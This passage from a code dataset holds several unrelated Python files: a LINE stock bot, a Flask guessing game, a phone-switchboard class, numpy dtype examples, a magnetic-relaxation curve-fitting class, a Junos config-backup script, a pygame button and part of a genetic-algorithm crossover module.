heroku'\n\n@app.route(\"/callback\", methods=['POST'])\ndef callback():\n signature = request.headers['X-Line-Signature']\n body = request.get_data(as_text=True)\n try:\n handler.handle(body, signature)\n except InvalidSignatureError:\n print(\"Invalid signature. Please check your channel access token/channel secret.\")\n abort(400)\n\n return 'OK'\n\n@handler.add(MessageEvent, message=TextMessage)\ndef handle_message(event):\n user_input = event.message.text\n if user_input == '?' or user_input == 'h':\n helptext = Help()\n line_bot_api.reply_message(\n event.reply_token,\n TextSendMessage(text=helptext))\n elif user_input[0:1] == '@':\n stockno = user_input[1:].strip()\n stocktext = getStockPrice(stockno)\n line_bot_api.reply_message(\n event.reply_token,\n TextSendMessage(text=stocktext))\n elif '營收/' in user_input:\n stockno = user_input.split('/')[1]\n stocktext = getRevenue(stockno)\n line_bot_api.reply_message(\n event.reply_token,\n TextSendMessage(text=stocktext))\n elif '資券/' in user_input:\n stockno = user_input.split('/')[1]\n stocktext = getCredittransaction(stockno)\n line_bot_api.reply_message(\n event.reply_token,\n TextSendMessage(text=stocktext))\n elif '現股當沖/' in user_input:\n stockno = user_input.split('/')[1]\n stocktext = getStockDayTrade(stockno)\n line_bot_api.reply_message(\n event.reply_token,\n TextSendMessage(text=stocktext)) \n elif '營益分析/' in user_input:\n stockno = user_input.split('/')[1]\n year = user_input.split('/')[2]\n season = user_input.split('/')[3]\n print(stockno, year, season)\n stocktext = getOperatingProfit(stockno, year, season)\n line_bot_api.reply_message(\n event.reply_token,\n TextSendMessage(text=stocktext)) \n else:\n errortext = '輸入指令錯誤,請重新輸入!!!\\n' + Help()\n line_bot_api.reply_message(\n event.reply_token,\n TextSendMessage(text=errortext)) \n\nif __name__ == \"__main__\":\n app.run()\n","repo_name":"white5168/stocklinbot","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":7490,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"31485637929","text":"from flask import Flask\nimport random\n\napp = Flask(__name__)\n\nrand_num = random.randint(1, 9)\ngif_list = ['https://media.giphy.com/media/xT0xeE8uyMskq0Jg9W/giphy.gif',\n 'https://media.giphy.com/media/RtFxzpt8RxzDqCAgLh/giphy.gif',\n 'https://media.giphy.com/media/cPKtFMVbJhyhO/giphy.gif',\n 'https://media.giphy.com/media/d1E1szXDsHUs3WvK/giphy.gif',\n 'https://media.giphy.com/media/JsyTC1TiBDuYpbj6ZL/giphy.gif',\n 'https://media.giphy.com/media/l0ExncehJzexFpRHq/giphy.gif',\n 'https://media.giphy.com/media/26xBPdoEvUPUHWGE8/giphy.gif']\n\nlast_gif = \"\"\n\ndef make_h1(fn):\n def wrapper(**kwargs):\n for key, value in kwargs.items():\n return f'

    {fn(value)}

    '\n return wrapper\n\ndef add_gif(fn):\n def wrapper(*args):\n global last_gif\n new_gif = True\n while new_gif:\n gif = random.choice(gif_list)\n if gif != last_gif:\n new_gif = False\n last_gif = gif\n return f'{fn(args[0])}
    '\n return wrapper\n\n@app.route('/')\ndef guess_number():\n global last_gif\n gif = random.choice(gif_list)\n last_gif = gif\n\n return f\"

    Guess a number between 0 and 9

    \"\n\n@app.route('/')\n@make_h1\n@add_gif\ndef number_check(number):\n global rand_num\n if number > rand_num:\n return \"Sorry you guessed too high!\"\n elif number < rand_num:\n return \"Sorry you guessed too low!\"\n else:\n return \"Congratulations, you guessed the number!\"\n\n\nif __name__ == \"__main__\":\n app.run(debug=True)\n","repo_name":"seaniomoran/HigherLower_FlaskGame","sub_path":"server.py","file_name":"server.py","file_ext":"py","file_size_in_byte":1615,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"40333244382","text":"'''\r\nFile: phone.py\r\nAuthor: Gurjinder Singh\r\nDate: 12/4/2020\r\nSection: 53\r\nE-mail: gsingh10@umbc.edu\r\nDescription: class for phone objects\r\n\r\n'''\r\n\"\"\"\r\n Phone Class Starter Code\r\n\r\n This code defines the basic functionality that you need from a phone.\r\n When these functions are called they should communicate with the\r\n switchboards to find a path\r\n\"\"\"\r\n\r\n\r\nclass Phone:\r\n def __init__(self, number, switchboard):\r\n \"\"\"\r\n :param number: the phone number without area code\r\n :param switchboard: the switchboard to which the number is attached.\r\n \"\"\"\r\n self.number = number\r\n self.switchboard = switchboard\r\n self.call = None\r\n self.otherPhone = None\r\n # Number is interger number\r\n # switchboard is the associated phone associated switchboard\r\n # call contains a phone object, ment to make algorithms easier\r\n # otherphone is the otherphones number\r\n\r\n def connect(self, area_code, other_phone_number):\r\n \"\"\"\r\n :param area_code: the area code of the other phone number\r\n :param other_phone_number: the other phone number without the area code\r\n :return: **this you must decide in your implementation**\r\n \"\"\"\r\n\r\n if self.call != None: #Force closes current call to make new call (makes more sense and stops alot of errors)\r\n print(\"Disconnecting current call to make new call\")\r\n self.disconnect()\r\n\r\n previous_codes = []#recursive function call to locate other phone\r\n output = self.switchboard.connect_call(area_code, other_phone_number, previous_codes)\r\n if output == None:\r\n print(\"Phone not found\")\r\n else:#swaps data between the 2 phone objects, making eachone linked\r\n self.call = output\r\n self.otherPhone = output.findPhone(other_phone_number)\r\n self.otherPhone.call = self.switchboard\r\n self.otherPhone.otherPhone = self\r\n\r\n #output.findPhone(other_phone_number).call = self.switchboard\r\n\r\n #output.findPhone(other_phone_number).otherPhone = self\r\n #print(self.call.area_code)\r\n #print(self.otherPhone.number)\r\n #print(self.otherPhone.call.area_code)\r\n #print(self.otherPhone.otherPhone.number)\r\n return output\r\n\r\n def searchList(self, list, number):#test method\r\n for i in list:\r\n if i.number == number:\r\n print(i.number)\r\n\r\n def display(self, phonenumber):#display\r\n output = \"\"\r\n if self.call == None:\r\n output = (\" Phone with number: \" + str(self.number) + \" is not in use.\")\r\n else:\r\n output = (\" Phone with number: \" + str(self.number) + \" is connected to \" + str(self.call.area_code) + \"-\" + str(self.otherPhone.otherPhone.number))\r\n return output\r\n\r\n def disconnect(self):\r\n \"\"\"\r\n This function should return the connection status to disconnected. You need\r\n to use new members of this class to determine how the phone is connected to\r\n the other phone.\r\n\r\n You should also make sure to disconnect the other phone on the other end of the line.\r\n :return: **depends on your implementation**\r\n \"\"\"\r\n if self.call == None:\r\n print(str(self.switchboard.area_code) + \"-\" + str(self.number) + \" is not in a call\")\r\n else:#swaps data for both phones back to None (emulating disconnecting)\r\n print(\"Disconnected (\" + str(self.switchboard.area_code) + \"-\" + str(self.number) + \") and (\" + str(self.call.area_code) + \"-\" + str(self.otherPhone.number) + \")\")\r\n self.otherPhone.call = None\r\n self.otherPhone.otherPhone = None\r\n self.call = None\r\n self.otherPhone = None\r\n\r\n\r\n\r\n","repo_name":"gsingh2124/CMSC-201","sub_path":"Projects/Project3/phone.py","file_name":"phone.py","file_ext":"py","file_size_in_byte":3892,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"4962888911","text":"import numpy as np\r\n\r\n# INT\r\nint_array = np.arange(10)\r\n# array([0, 1, 2, 3, 4, 5, 6, 7, 8, 9])\r\n\r\nint_array.dtype\r\n# dtype('int32')\r\n\r\n# FLOAT\r\nfloat_array = np.arange(10,dtype='float64')\r\n# array([0., 1., 2., 3., 4., 5., 6., 7., 8., 9.])\r\n\r\nfloat_array.dtype\r\n# dtype('float64')\r\n\r\n# COMPLEX\r\ncomplex_arr = np.array([1+2j, 2+4j])\r\n# array([1.+2.j, 2.+4.j])\r\n\r\ncomplex_arr.dtype\r\n# dtype('complex128')\r\n\r\n# BOOLEAN\r\nboolean_arr = np.array([True, False, True, False])\r\n\r\nboolean_arr.dtype\r\n# bool\r\n\r\n# for other datatypes refer https://numpy.org/doc/stable/user/basics.types.html","repo_name":"Akshaykumarcp/numpy","sub_path":"0.3_data_types.py","file_name":"0.3_data_types.py","file_ext":"py","file_size_in_byte":579,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"8371358404","text":"from PyQt6.QtCore import QObject, pyqtSignal, pyqtBoundSignal\nfrom PyQt6.QtWidgets import QFileDialog, QWidget, QMessageBox\nfrom PyQt6.QtGui import QUndoStack, QUndoCommand\n\nfrom .Relaxation import Relaxation\nfrom .Measurement import Measurement \nfrom .Parameter import Parameter\n\nfrom protocols import SettingsSource, Collection\n\nfrom readers import SettingsReader\n\nfrom pandas import DataFrame, Series, concat # type: ignore\nfrom numpy import ndarray, pi, power, finfo, diag, sum, sqrt, pi, power, linspace, log10, logspace\nfrom numpy import max as np_max\nfrom numpy import min as np_min\nfrom scipy.optimize import least_squares # type: ignore\nfrom scipy.linalg import svd #type: ignore\nfrom math import nextafter\n\nfrom typing import Self \n\nclass Fit(QObject):\n \"\"\"Represent one fit for Havriliak-Negami model with n-relaxation.\n\n Args:\n name (str): Name of fit.\n df (DataFrame): Measurement data(processed data from magnetometer).\n temp (float): Temperature measured during the measurement.\n field (float): Magnetic field strength during measurement.\n compound (SettingsSource): Examined compound.\n collection (Collection | None): The collection to which it belongs.\n\n Attributes:\n name_changed: Emitted when name change. Contains new name.\n df_changed: Emitted when at least one row in df changed.\n df_point_deleted: Emitted when row in df is removed.\n deletion_imposible: Emitted when deletion operation could not be performed.\n \"\"\"\n\n name_changed: pyqtSignal = pyqtSignal(str)\n df_changed: pyqtSignal = pyqtSignal()\n df_point_deleted: pyqtSignal = pyqtSignal()\n deletion_imposible:pyqtSignal = pyqtSignal()\n\n @staticmethod\n def model(logFrequency: ndarray, alpha: float, beta: float, tau: float, chi_dif: float, chi_s: float) -> ndarray:\n \"\"\"Implemntation of Havriliak-Negami model\n\n Args:\n logFrequency (ndarray): Logarytm of frequency.\n alpha (float): Alpha parameter\n beta (float): Beta parameter\n tau (float): Time of relaxation.\n chi_dif (float): chi_t - chi_s\n chi_s (float): \n\n Returns:\n ndarray: Model predictions for each point in domain\n \"\"\"\n return chi_s + (chi_dif)/((1 + (10**logFrequency*2*pi * power(10, tau) * 1j )**(1- alpha))**beta)\n\n @staticmethod\n def from_measurement(measurement: Measurement, compound:SettingsSource, nr_of_relaxations: int = 1):\n \"\"\" Create new Fit from Measurement and append it to the collection.\n\n\n Args:\n measurement (Measurement): Measurement from which Fit will be created.\n compound (SettingsSource): Source of boundaries for parameters.\n nr_of_relaxations (int, optional): Number of relaxations in Havriliak-Negami model. Defaults to 1.\n\n Returns:\n Fit: Created Fit\n \"\"\"\n df = measurement._df\n if df.isnull().values.any():\n msg: QMessageBox = QMessageBox()\n msg.setIcon(QMessageBox.Icon.Warning)\n msg.setText(f\"Some data in measurement named: {measurement._name} is missing.\\n Fit was not created!\")\n msg.setWindowTitle(\"Fit creation canceled\")\n msg.exec()\n return None\n \n fit_name: str = measurement._name + \"_Fit_Frequency\"\n fit: Fit = Fit(fit_name, measurement._df.copy(), measurement._tmp, measurement._field, compound, None)\n\n fit.relaxations = []\n i: int\n for i in range(nr_of_relaxations):\n fit.relaxations.append(Relaxation(compound))\n\n return fit\n def __init__(self, name: str, df: DataFrame, temp: float, field: float, compound:SettingsSource, collection: Collection[\"Fit\"]|None):\n super().__init__()\n self._name: str = name\n self._df: DataFrame = df\n\n self._tmp: float = temp\n self._field: float = field\n\n self.relaxations: list[Relaxation] = []\n\n self._compound: SettingsSource = compound\n self._collection: Collection[\"Fit\"] | None\n if collection is not None:\n self._collection = collection\n\n self._undo_stack: QUndoStack = QUndoStack()\n self.resolution = 50 # TO::DO \n\n for r in self.relaxations:\n r.reset_errors.connect(self.reset_errors_in_all_relaxations)\n\n def reset_errors_in_all_relaxations(self):\n for r in self.relaxations:\n r.set_all_errors(0.0, [0.0,0.0,0.0,0.0,0.0])\n\n @property\n def name(self):\n return self._name\n\n @name.setter\n def name(self, val:str):\n if len(val) < 1:\n raise ValueError(\"Compund name must be at least one character long\")\n if self._collection is not None:\n self._collection.update_names(old_name=self._name, new_name=val)\n self._name = val\n self.name_changed.emit(val)\n\n class Rename(QUndoCommand):\n def __init__(self, fit: \"Fit\", new_name:str):\n super().__init__()\n self._fit = fit\n self.new_name = new_name\n self.old_name = fit.name\n \n def redo(self) -> None:\n self._fit.name = self.new_name\n\n def undo(self) -> None:\n self._fit.name = self.old_name\n\n class HidePoint(QUndoCommand):\n def __init__(self, fit: \"Fit\", x: float, x_str: str):\n super().__init__()\n self.fit: Fit = fit\n self.x: float = x\n self.x_str: str = x_str\n\n def redo(self) -> None:\n self.fit._hide_point(self.x, self.x_str)\n\n def undo(self) -> None:\n self.fit._hide_point(self.x, self.x_str)\n\n class DeletePoint(QUndoCommand):\n def __init__(self, fit: \"Fit\", x: float, x_str: str, error_signal: pyqtBoundSignal):\n\n super().__init__()\n self.fit: Fit = fit\n self.x: float = x\n self.x_str: str = x_str\n self.point: DataFrame = DataFrame()\n self.error_signal = error_signal\n\n def redo(self) -> None:\n try:\n self.point = self.fit._delete_point(self.x, self.x_str)\n except IndexError:\n self.error_signal.emit()\n\n def undo(self) -> None:\n self.fit._df = concat([self.fit._df, self.point])\n self.fit.df_changed.emit()\n\n @property\n def molar_mass(self):\n return self._molar_mass\n\n @molar_mass.setter\n def molar_mass(self, val:float):\n if val <= 0:\n raise ValueError(\"Molar mass must be greater than 0\")\n\n self._molar_mass = val\n\n def set_name(self, new_name: str):\n \"\"\"Sets fit name. This action can be undone.\n\n Args:\n new_name (str): New measurement name\n \"\"\"\n self._undo_stack.push(self.Rename(self, new_name))\n \n def hide_point(self, x: float, x_str: str):\n \"\"\"Change point visibility on the opposite of actual. This action can be undone.\n\n Args:\n x (float): Value of point for domain column.\n x_str (str): Name of domain column.\n \"\"\"\n self._undo_stack.push(self.HidePoint(self, x, x_str))\n\n def delete_point(self, x: float, x_str: str):\n \"\"\"Delete point. This action can be undone.\n\n Args:\n x (float): Value of point for domain column.\n x_str (str): Name of domain column.\n\n Raises:\n IndexError: Raised when there is not enough points to delete any more.\n \"\"\"\n self._undo_stack.push(self.DeletePoint(self, x, x_str, self.deletion_imposible))\n\n def _hide_point(self, x: float, x_str: str):\n \"\"\"Hide point \n\n Args:\n x (float): Value of point for domain column.\n x_str (str): Name of domain column.\n \"\"\"\n actual: bool = bool(self._df.loc[self._df[x_str] == x]['Hidden'].values[0])\n self._df.loc[self._df[x_str] == x, \"Hidden\"] = not actual\n self.df_changed.emit()\n\n def _delete_point(self, x: float, x_str: str):\n \"\"\"Delete point \n\n Args:\n x (float): Value of point for domain column.\n x_str (str): Name of domain column.\n \"\"\"\n if self._df.shape[0] == 2:\n raise IndexError\n\n point: DataFrame = self._df.loc[self._df[x_str] == x]\n self._df.drop(self._df.loc[self._df[x_str] == x].index, inplace=True)\n self.df_point_deleted.emit()\n return point\n\n\n def cost_function(self, p):\n \"\"\"Cost function minimalized in least_square method in fitting process.\n\n Args:\n p (_type_): Parameters for all relaxations.\n\n Returns:\n _type_: Cost of fit.\n \"\"\"\n rest = self._df.loc[self._df[\"Hidden\"] == False]\n\n sum_real = 0\n sum_img = 0\n i = 0\n while i < len(self.relaxations):\n r = Fit.model(rest[\"FrequencyLog\"].values, p[0+i*5], p[1+i*5], p[2+i*5], p[3+i*5], p[4+i*5])\n sum_real += r.real\n sum_img += -r.imag\n\n i += 1\n\n dif_real = abs((sum_real - rest['ChiPrimeMol']))\n dif_img = abs((sum_img - rest['ChiBisMol']))\n\n\n return dif_real + dif_img\n\n def make_auto_fit(self, auto: bool = False, next_fit: Self = None): # type: ignore\n \"\"\"Solve a nonlinear least-squares problem with bounds on the variables for cost_function().\n\n Args:\n auto (bool, optional): Determines whether fit was explicitly call by user. Defaults to False.\n next_fit (Self, optional): Fit to transfer parameters value in case of performing automated fit process for mutiple Fits. Defaults to None.\n \"\"\"\n if len(self.relaxations) == 1:\n not_blocked_parameters:list[Parameter] = []\n blocked_parameters:list[Parameter] = [] \n\n for j, p in enumerate(self.relaxations[0].parameters):\n if p.is_blocked:\n blocked_parameters.append(p)\n else:\n not_blocked_parameters.append(p)\n\n param_str = \"\"\n for p in not_blocked_parameters:\n param_str = param_str +f\", {p.name}\"\n\n not_blocked_names = [p.name for p in not_blocked_parameters]\n not_blocked_params = [p.value for p in not_blocked_parameters]\n\n model_body = \"return {chi_s} + ({chi_dif})/((1 + (10**logFrequency*2*pi * power(10, {tau}) * 1j )**(1- {alpha}))**{beta})\".format(\n chi_s=\"chi_s\" if \"chi_s\" in not_blocked_names else next((x for x in blocked_parameters if x.name == \"chi_s\")).value,\n chi_dif=\"chi_dif\" if \"chi_dif\" in not_blocked_names else next((x for x in blocked_parameters if x.name == \"chi_dif\")).value,\n tau=\"log10_tau\" if \"log10_tau\" in not_blocked_names else next((x for x in blocked_parameters if x.name == \"log10_tau\")).value,\n alpha=\"alpha\" if \"alpha\" in not_blocked_names else next((x for x in blocked_parameters if x.name == \"alpha\")).value,\n beta=\"beta\" if \"beta\" in not_blocked_names else next((x for x in blocked_parameters if x.name == \"beta\")).value,\n )\n meta_model_str = \"\"\"\ndef m_model(logFrequency {param_str}):\n {model_body}\nself.meta_model = m_model\n \"\"\".format(model_body= model_body, param_str=param_str)\n\n exec(meta_model_str, {\"self\":self, \"pi\":pi, \"power\":power})\n exec(\"\"\"\ndef meta_auto_fit(self):\n def cost_function(p):\n rest = self._df.loc[self._df[\"Hidden\"] == False]\n sum_real = 0\n sum_img = 0\n\n r = self.meta_model(rest[\"FrequencyLog\"].values, *p)\n sum_real += r.real\n sum_img += -r.imag\n\n dif_real = abs((sum_real - rest['ChiPrimeMol']))\n dif_img = abs((sum_img - rest['ChiBisMol']))\n \n return dif_real + dif_img\n \n settings: SettingsReader = SettingsReader()\n tole = settings.get_tolerances()\n\n try:\n try:\n res = least_squares(cost_function, not_blocked_params, ftol=tole[\"f_tol\"], xtol=tole[\"x_tol\"], gtol=tole[\"g_tol\"])\n except ValueError as e:\n msg: QMessageBox = QMessageBox()\n msg.setIcon(QMessageBox.Icon.Warning)\n msg.setText(\"One of tolerances is to low. You can adjust them in settings.\")\n msg.setText(str(e))\n msg.setWindowTitle(\"Auto fit failed\")\n msg.exec()\n return\n _, s, Vh = svd(res.jac, full_matrices=False)\n tol = finfo(float).eps * s[0] * np_max(res.jac.shape)\n w = s > tol\n cov = (Vh[w].T/s[w]**2) @ Vh[w] # robust covariance matrix\n\n chi2dof = sum(res.fun**2)/(res.fun.size - res.x.size)\n cov *= chi2dof\n\n perr = sqrt(diag(cov))\n except Exception as e:\n msg = QMessageBox()\n msg.setIcon(QMessageBox.Icon.Warning)\n msg.setText(\"Something went wrong. Try change starting values of parameters.\")\n msg.setText(str(e))\n msg.setWindowTitle(\"Auto fit failed\")\n msg.exec()\n return\n\n for i,p in enumerate(not_blocked_parameters):\n p.set_value(res.x[i])\n p.set_error(perr[i], silent=True)\n \n for p in blocked_parameters:\n p.set_error(0.0, silent=True)\n \n self.relaxations[0].residual_error = res.cost\n self.relaxations[0].all_parameters_changed.emit() \n\n \n if auto:\n self.save_all_relaxations()\n if next_fit != None: #type: ignore\n self.copy_all_relxations(next_fit) \n \nmeta_auto_fit(self)\n \"\"\", {\"self\": self, \"SettingsReader\":SettingsReader, \"not_blocked_params\": not_blocked_params, \"QMessageBox\":QMessageBox, \"svd\":svd,\n \"finfo\":finfo, \"np_max\":np_max, \"sum\":sum, \"sqrt\":sqrt, \"not_blocked_parameters\":not_blocked_parameters, \"blocked_parameters\": blocked_parameters,\n \"next_fit\": next_fit, \"least_squares\": least_squares, \"diag\":diag, \"auto\":auto })\n return\n else:\n params: tuple = ()\n min: list = []\n max: list = []\n for r_nr in range(len(self.relaxations)):\n relaxation = self.relaxations[r_nr]\n params = params + relaxation.get_parameters_values()\n min = min + relaxation.get_parameters_min_bounds()\n max = max + relaxation.get_parameters_max_bounds()\n\n \n r: Relaxation\n i: int\n for i, r in enumerate(self.relaxations):\n for j, p in enumerate(r.parameters):\n if p.is_blocked:\n min[j + i*len(r.parameters)] = nextafter(p.value, min[j + i*len(r.parameters)])\n max[j + i*len(r.parameters)] = nextafter(p.value, max[j + i*len(r.parameters)])\n\n bounds: tuple[list[float], list[float]] = (min, max)\n minimal: float = np_min(params)\n maximal: float = np_max(params)\n\n settings: SettingsReader = SettingsReader()\n tole = settings.get_tolerances()\n try:\n try:\n res = least_squares(self.cost_function, params, bounds=bounds, ftol=tole[\"f_tol\"], xtol=tole[\"x_tol\"], gtol=tole[\"g_tol\"])\n except ValueError as e:\n msg: QMessageBox = QMessageBox()\n msg.setIcon(QMessageBox.Icon.Warning)\n msg.setText(\"One of tolerances is to low. You can adjust them in settings.\\n\")\n msg.setText(str(e))\n msg.setWindowTitle(\"Auto fit failed\")\n msg.exec()\n return\n\n _, s, Vh = svd(res.jac, full_matrices=False)\n tol = finfo(float).eps * s[0] * np_max(res.jac.shape)\n w = s > tol\n cov = (Vh[w].T/s[w]**2) @ Vh[w] # robust covariance matrix\n\n chi2dof = sum(res.fun**2)/(res.fun.size - res.x.size)\n cov *= chi2dof\n\n perr = sqrt(diag(cov))\n except Exception as e:\n msg = QMessageBox()\n msg.setIcon(QMessageBox.Icon.Warning)\n msg.setText(\"Something went wrong. Try change starting values of parameters.\\n\")\n msg.setText(str(e))\n msg.setWindowTitle(\"Auto fit failed\")\n msg.exec()\n return\n\n for i, r in enumerate(self.relaxations):\n for j, p in enumerate(r.parameters):\n p.set_value(res.x[j + i*len(r.parameters)])\n\n for i, r in enumerate(self.relaxations):\n r.set_all_errors(res.cost, perr[i*5 : i*5+5])\n\n if auto:\n self.save_all_relaxations()\n if next_fit != None: #type: ignore\n self.copy_all_relxations(next_fit)\n\n def save_to_file(self):\n \"\"\"Savig result to .csv file\"\"\"\n save_name, _ = QFileDialog.getSaveFileName(QWidget(), 'Save file')\n if save_name is not None:\n try:\n with open(save_name + (\".csv\" if save_name[-4:] != \".csv\" else \"\"), \"w\") as f:\n self.get_result().to_csv(f.name, index=False, sep = \";\")\n except Exception as e:\n print(e)\n return\n\n def get_result(self,) -> DataFrame:\n \"\"\"Get DataFrame with results of fitting process.\n\n Returns:\n DataFrame: Result of fit in DataFrame format.\n \"\"\"\n\n df_param: DataFrame = DataFrame([['T', self._tmp, 0], ['H', self._field, 0]], columns=['Name', 'Value','Error'])\n\n \n df_experimental: DataFrame = self._df[[\"Frequency\", \"ChiPrimeMol\",\"ChiBisMol\"]]\n columns_names: list[str] = [f\"Frequency T={self._tmp} H={self._field}\",\n f\"ChiPrimeMol T={self._tmp} H={self._field}\", f\"ChiBisMol T={self._tmp} H={self._field}\"]\n df_experimental.columns = columns_names\n df_experimental.reset_index(drop=True, inplace=True)\n \n df_model_final: DataFrame = DataFrame()\n for i, r in enumerate(self.relaxations):\n for p in r.saved_parameters:\n name:str = p.name if p.name != \"chi_dif\" else \"chi_t-chi_s\"\n row = { \"Name\": f\"{name}{i+1}\", \"Value\": p.value, \"Error\": p.error}\n df_param = concat([df_param, DataFrame([row])], ignore_index=True)\n\n\n df_model: DataFrame = DataFrame()\n displayed: DataFrame = self._df.loc[self._df[\"Hidden\"] == False]\n\n xx:ndarray = logspace(log10(displayed[\"Frequency\"].min()), log10(displayed[\"Frequency\"].max()), self.resolution)\n df_model[\"Model\"+columns_names[0]] = Series(xx)\n yy = Fit.model(log10(xx), *self.relaxations[i].get_saved_parameters_values())\n df_model[\"Model\"+columns_names[1]] = Series(yy.real)\n df_model[\"Model\"+columns_names[2]] = Series(-yy.imag)\n df_model_final = concat([df_model_final, df_model], axis=1)\n\n if i != 0:\n columns = list(df_model_final.columns)\n for j in range(0, len(columns), 3):\n rel_str:str = f\" rel_nr={j//3 + 1}\"\n columns[j] += rel_str\n columns[j+1] += rel_str\n columns[j+2] += rel_str\n df_model_final.columns = columns\n\n df: DataFrame = concat([df_param, df_experimental, df_model_final], axis=1)\n return df\n\n def save_all_relaxations(self):\n \"\"\"Save current parameters of all relaxations.\n \"\"\"\n for r in self.relaxations:\n r.save()\n\n def copy_all_relxations(self, other: Self): #type: ignore\n \"\"\"Copy saved parameters for all relaxations\"\"\"\n for i, r in enumerate(other.relaxations): #type: ignore\n r.copy(self.relaxations[i])\n\n def get_jsonable(self) -> dict:\n \"\"\"Marshal object to python dictionary.\n\n Returns:\n dict: Dictionary ready to save as .json\n \"\"\"\n\n r_list: list[dict] = []\n for r in self.relaxations:\n r_list.append(r.get_jsonable())\n jsonable = {\n \"name\": self._name, \n \"df\": self._df.to_json(),\n \"tmp\": self._tmp,\n \"field\": self._field,\n \"relaxations\": r_list\n }\n return jsonable\n\n def update_relaxations_from_json(self, relaxations_json: list[dict]):\n \"\"\"From given dictionary recreate saved state of relaxations.\n\n Args:\n relaxations_json (list[dict]): Result of self.get_jsonable()\n \"\"\"\n self.relaxations = []\n for i, r_j in enumerate(relaxations_json):\n r: Relaxation = Relaxation(self._compound)\n r.residual_error = r_j[\"residual_error\"]\n r.saved_residual_error = r_j[\"saved_residual_error\"]\n r.was_saved = r_j[\"was_saved\"]\n \n for j, p in enumerate(r.parameters):\n p.update_from_json(r_j[\"parameters\"][j])\n\n for k, s_p in enumerate(r.saved_parameters):\n s_p.update_from_json(r_j[\"saved_parameters\"][k])\n\n self.relaxations.append(r)\n\n def undo(self):\n self._undo_stack.undo()\n\n def redo(self):\n self._undo_stack.redo()","repo_name":"ZychuDev/relACs","sub_path":"models/Fit.py","file_name":"Fit.py","file_ext":"py","file_size_in_byte":21370,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"42243235762","text":"#!/usr/bin/python3\n\nimport os\nimport sys\nimport json\nimport yaml\nimport argparse\nfrom pathlib import Path\n\nfrom jnpr.junos import Device\nfrom jnpr.junos.utils.config import Config\nfrom jnpr.junos.exception import ConnectError\n\nfrom lxml import etree\n\nparser = argparse.ArgumentParser()\nparser.add_argument('-s', '--sshconfig', help='SSH config file', default='~/.ssh/config_homer')\nparser.add_argument('-d', '--outputdir', help='Directory for saved config files', default='saved_configs')\nparser.add_argument('-t', '--topology_file', help='Location of containerlab topology file.', required=True)\nargs = parser.parse_args()\n\ndef main():\n Path(f\"{args.outputdir}\").mkdir(exist_ok=True, parents=True)\n\n with open(args.topology_file, 'r') as topology_file:\n clab = yaml.safe_load(topology_file)\n\n for node_name, node_conf in clab['topology']['nodes'].items():\n if node_conf['kind'] in ['vr-vqfx', 'vr-vmx', 'crpd']:\n print(f\"Connecting to {node_name}... \", end=\"\", flush=True)\n junos_dev = get_junos_dev(node_name)\n config = junos_dev.rpc.get_config(options={'format':'json'})\n with open(f\"{args.outputdir}/{node_name}.json\", \"w\") as config_file:\n config_file.write(json.dumps(config))\n config = junos_dev.rpc.get_config(options={'format':'set'})\n with open(f\"{args.outputdir}/{node_name}.cfg\", \"w\") as config_file:\n config_file.write(etree.tostring(config, encoding='unicode'))\n print(\"saved ok.\")\n\n\ndef get_junos_dev(dev_name):\n # Initiates NETCONF session to router\n try:\n device = Device(dev_name, ssh_config=args.sshconfig, port=22)\n device.open()\n except ConnectError as err:\n print(f\"Cannot connect to device: {err}\")\n sys.exit(1)\n\n # Get config object\n device.bind(config=Config)\n\n return device\n\n\nif __name__ == '__main__':\n main()\n\n","repo_name":"topranks/homerlabs","sub_path":"save_junos_configs.py","file_name":"save_junos_configs.py","file_ext":"py","file_size_in_byte":1918,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"24144730232","text":"import pygame\npygame.font.init() # you have to call this at the start, \n # if you want to use this module.\nmy_font = pygame.font.SysFont('Comic Sans MS', 30)\nclass Button:\n\n def __init__(self, text, x, y, onClick, width=100, height=50):\n self.text = text\n self.rect = pygame.Rect(x, y, width, height)\n self.color = (120, 120, 120)\n self.onClick = onClick\n\n def draw(self, screen):\n pygame.draw.rect(screen, self.color, self.rect)\n screen.blit(my_font.render(self.text, False, (255, 255, 255)), (self.rect.x, self.rect.y))\n\n def update(self, clicked):\n x, y = pygame.mouse.get_pos()\n if(self.rect.collidepoint((x, y))):\n self.color = (60, 60, 60)\n if(clicked):\n self.onClick()\n else:\n self.color = (120, 120, 120)\n \n","repo_name":"arifo99/ticTacToeBot","sub_path":"button.py","file_name":"button.py","file_ext":"py","file_size_in_byte":856,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"36816230785","text":"\nimport random\nimport numpy as np\n\nneighgen_operators = ['cxOnePoint',\n 'cxTwoPoint',\n 'cxUniform',\n 'cxBlend',\n 'cxUniformBlend',\n 'sxSuppress'\n ]\n\n\ndef cxOnePoint(ind1, ind2):\n size = min(len(ind1), len(ind2))\n ind1o = ind1.deepcopy()\n ind2o = ind2.deepcopy()\n cxpoint = random.randint(1, size - 1)\n ind1[cxpoint:], ind2[cxpoint:] = ind2o[cxpoint:], ind1o[cxpoint:]\n\n return ind1, ind2\n\n\ndef cxTwoPoint(ind1, ind2):\n size = min(len(ind1), len(ind2))\n ind1o = ind1.deepcopy()\n ind2o = ind2.deepcopy()\n cxpoint1 = random.randint(1, size)\n cxpoint2 = random.randint(1, size - 1)\n if cxpoint2 >= cxpoint1:\n cxpoint2 += 1\n else: # Swap the two cx points\n cxpoint1, cxpoint2 = cxpoint2, cxpoint1\n\n ind1[cxpoint1:cxpoint2], ind2[cxpoint1:cxpoint2] \\\n = ind2o[cxpoint1:cxpoint2], ind1o[cxpoint1:cxpoint2]\n\n return ind1, ind2\n\n\ndef cxUniform(ind1, ind2, indpb):\n size = min(len(ind1), len(ind2))\n ind1o = ind1.deepcopy()\n ind2o = ind2.deepcopy()\n for i in range(size):\n if random.random() < indpb:\n ind1[i], ind2[i] = ind2o[i], ind1o[i]\n\n return ind1, ind2\n\n\ndef cxBlend(ind1, ind2, alpha):\n ind1o = ind1.deepcopy()\n 